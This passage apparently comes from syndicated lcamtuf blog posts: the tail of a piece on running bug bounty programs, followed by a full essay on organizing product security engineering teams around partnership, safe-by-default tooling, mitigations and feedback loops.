positive. On the flip side, there is no faster way to make enemies than to make a security researcher feel that they
are now talking to a lawyer or to the PR dept.

Most people have strong opinions on disclosure policies; instead of imposing your own views, strive to patch reported bugs
reasonably quickly, and almost every reporter will play along. Demand researchers to cancel conference appearances,
take down blog posts, or sign NDAs, and you will sooner or later end up in the news.

But what if that’s not enough?

As with any business endeavor, mistakes will happen; total risk avoidance is seldom the answer. Learn to sincerely
apologize for mishaps; it’s not a sign of weakness to say “sorry, we messed up”. And you will almost certainly not end
up in the courtroom for doing so.

It’s good to foster a healthy and productive relationship with the community, so that they come to your defense when
something goes wrong. Encouraging people to disclose bugs and talk about their experiences is one way of accomplishing that.

What about extortion?

You should structure your program to naturally discourage bad behavior and make it stand out like a sore thumb.
Require bona fide reports with complete technical details before any reward decision is made by a panel of named peers;
and make it clear that you never demand non-disclosure as a condition of getting a reward.

To avoid researchers accidentally putting themselves in awkward situations, have clear rules around data exfiltration
and lateral movement: assure them that you will always pay based on the worst-case impact of their findings; in exchange,
ask them to stop as soon as they get a shell and never access any data that isn’t their own.

So… are there any downsides?

Yep. Other than souring up your relationship with the community if you implement your program wrong, the other consideration
is that bug bounties tend to generate a lot of noise from well-meaning but less-skilled researchers.

When this happens, do not get frustrated and do not penalize such participants; instead, help them grow. Consider
publishing educational articles, giving advice on how to investigate and structure reports, or
offering free workshops every now and then.

The other downside is cost; although bug bounties tend to offer far more bang for your buck than your average penetration
test, they are more random. The annual expenses tend to be fairly predictable, but there is always
some possibility of having to pay multiple top-tier rewards in rapid succession. This is the kind of uncertainty that
many mid-level budget planners react badly to.

Finally, you need to be able to fix the bugs you receive. It would be nuts to prefer to not know about the
vulnerabilities in the first place – but once you invite the research, the clock starts ticking and you need to
ship fixes reasonably fast.

So… should I try it?

There are folks who enthusiastically advocate for bug bounties in every conceivable situation, and people who dislike them
with fierce passion; both sentiments are usually strongly correlated with the line of business they are in.

In reality, bug bounties are not a cure-all, and there are some ways to make them ineffectual or even dangerous.
But they are not as risky or expensive as most people suspect, and when done right, they can actually be fun for your
team, too. You won’t know for sure until you try.

Getting product security engineering right

Post Syndicated from Michal Zalewski original http://lcamtuf.blogspot.com/2018/02/getting-product-security-engineering.html

Product security is an interesting animal: it is a uniquely cross-disciplinary endeavor that spans policy, consulting,
process automation, in-depth software engineering, and cutting-edge vulnerability research. And in contrast to many
other specializations in our field of expertise – say, incident response or network security – we have virtually no
time-tested and coherent frameworks for setting it up within a company of any size.

In my previous post, I shared some thoughts
on nurturing technical organizations and cultivating the right kind of leadership within. Today, I figured it would
be fitting to follow up with several notes on what I learned about structuring product security work – and about actually
making the effort count.

The “comfort zone” trap

For security engineers, knowing your limits is a sought-after quality: there is nothing more dangerous than a security
expert who goes off script and starts dispensing authoritatively-sounding but bogus advice on a topic they know very
little about. But that same quality can be destructive when it prevents us from growing beyond our most familiar role: that of
a critic who pokes holes in other people’s designs.

The role of a resident security critic lends itself all too easily to a sense of supremacy: the mistaken
belief that our cognitive skills exceed the capabilities of the engineers and product managers who come to us for help
– and that the cool bugs we file are the ultimate proof of our special gift. We start taking pride in the mere act
of breaking somebody else’s software – and then write scathing but ineffectual critiques addressed to executives,
demanding that they either put a stop to a project or sign off on a risk. And hey, in the latter case, they better
brace for our triumphant “I told you so” at some later date.

Of course, escalations of this type have their place, but they need to be a very rare sight; when practiced routinely, they are a telltale
sign of a dysfunctional team. We might be failing to think up viable alternatives that are in tune with business or engineering needs; we might
be very unpersuasive, failing to communicate with other rational people in a language they understand; or it might be that our tolerance for risk
is badly out of whack with the rest of the company. Whatever the cause, I’ve seen high-level escalations where the security team
spoke of valiant efforts to resist inexplicably awful design decisions or data sharing setups; and where product leads in turn talked about
pressing business needs randomly blocked by obstinate security folks. Sometimes, simply having them compare their notes would be enough to arrive
at a technical solution – such as sharing a less sensitive subset of the data at hand.

To be effective, any product security program must be rooted in a partnership with the rest of the company, focused on helping them get stuff done
while eliminating or reducing security risks. To combat the toxic us-versus-them mentality, I found it helpful to have some team members with
software engineering backgrounds, even if it’s the ownership of a small open-source project or so. This can broaden our horizons, helping us see
that we all make the same mistakes – and that not every solution that sounds good on paper is usable once we code it up.

Getting off the treadmill

All security programs involve a good chunk of operational work. For product security, this can be a combination of product launch reviews, design consulting requests, incoming bug reports, or compliance-driven assessments of some sort. And curiously, such reactive work also has the property of gradually expanding to consume all the available resources on a team: next year is bound to bring even more review requests, even more regulatory hurdles, and even more incoming bugs to triage and fix.

Being more tractable, such routine tasks are also more readily enshrined in SDLs, SLAs, and all kinds of other official documents that are often mistaken for a mission statement that justifies the existence of our teams. Soon, instead of explaining to a developer why they should fix a particular problem right away, we end up pointing them to page 17 in our severity classification guideline, which defines that “severity 2” vulnerabilities need to be resolved within a month. Meanwhile, another policy may be telling them that they need to run a fuzzer or a web application scanner for a particular number of CPU-hours – no matter whether it makes sense or whether the job is set up right.

To run a product security program that scales sublinearly, stays abreast of future threats, and doesn’t erect bureaucratic speed bumps just for the sake of it, we need to recognize this inherent tendency for operational work to take over – and we need to reign it in. No matter what the last year’s policy says, we usually don’t need to be doing security reviews with a particular cadence or to a particular depth; if we need to scale them back 10% to staff a two-quarter project that fixes an important API and squashes an entire class of bugs, it’s a short-term risk we should feel empowered to take.

As noted in my earlier post, I find contingency planning to be a valuable tool in this regard: why not ask ourselves how the team would cope if the workload went up another 30%, but bad financial results precluded any team growth? It’s actually fun to think about such hypotheticals ahead of the time – and hey, if the ideas sound good, why not try them out today?

Living for a cause

It can be difficult to understand if our security efforts are structured and prioritized right; when faced with such uncertainty, it is natural to stick to the safe fundamentals – investing most of our resources into the very same things that everybody else in our industry appears to be focusing on today.

I think it’s important to combat this mindset – and if so, we might as well tackle it head on. Rather than focusing on tactical objectives and policy documents, try to write down a concise mission statement explaining why you are a team in the first place, what specific business outcomes you are aiming for, how do you prioritize it, and how you want it all to change in a year or two. It should be a fluid narrative that reads right and that everybody on your team can take pride in; my favorite way of starting the conversation is telling folks that we could always have a new VP tomorrow – and that the VP’s first order of business could be asking, “why do you have so many people here and how do I know they are doing the right thing?”. It’s a playful but realistic framing device that motivates people to get it done.

In general, a comprehensive product security program should probably start with the assumption that no matter how many resources we have at our disposal, we will never be able to stay in the loop on everything that’s happening across the company – and even if we did, we’re not going to be able to catch every single bug. It follows that one of our top priorities for the team should be making sure that bugs don’t happen very often; a scalable way of getting there is equipping engineers with intuitive and usable tools that make it easy to perform common tasks without having to worry about security at all. Examples include standardized, managed containers for production jobs; safe-by-default APIs, such as strict contextual autoescaping for XSS or type safety for SQL; security-conscious style guidelines; or plug-and-play libraries that take care of common crypto or ACL enforcement tasks.

Of course, not all problems can be addressed on framework level, and not every engineer will always reach for the right tools. Because of this, the next principle that I found to be worth focusing on is containment and mitigation: making sure that bugs are difficult to exploit when they happen, or that the damage is kept in check. The solutions in this space can range from low-level enhancements (say, hardened allocators or seccomp-bpf sandboxes) to client-facing features such as browser origin isolation or Content Security Policy.

The usual consulting, review, and outreach tasks are an important facet of a product security program, but probably shouldn’t be the sole focus of your team. It’s also best to avoid undue emphasis on vulnerability showmanship: while valuable in some contexts, it creates a hypercompetitive environment that may be hostile to less experienced team members – not to mention, squashing individual bugs offers very limited value if the same issue is likely to be reintroduced into the codebase the next day. I like to think of security reviews as a teaching opportunity instead: it’s a way to raise awareness, form partnerships with engineers, and help them develop lasting habits that reduce the incidence of bugs. Metrics to understand the impact of your work are important, too; if your engagements are seen mostly as a yet another layer of red tape, product teams will stop reaching out to you for advice.

The other tenet of a healthy product security effort requires us to recognize at a scale and given enough time, every defense mechanism is bound to fail – and so, we need ways to prevent bugs from turning into incidents. The efforts in this space may range from developing product-specific signals for the incident response and monitoring teams; to offering meaningful vulnerability reward programs and nourishing a healthy and respectful relationship with the research community; to organizing regular offensive exercises in hopes of spotting bugs before anybody else does.

Oh, one final note: an important feature of a healthy security program is the existence of multiple feedback loops that help you spot problems without the need to micromanage the organization and without being deathly afraid of taking chances. For example, the data coming from bug bounty programs, if analyzed correctly, offers a wonderful way to alert you to systemic problems in your codebase – and later on, to measure the impact of any remediation and hardening work.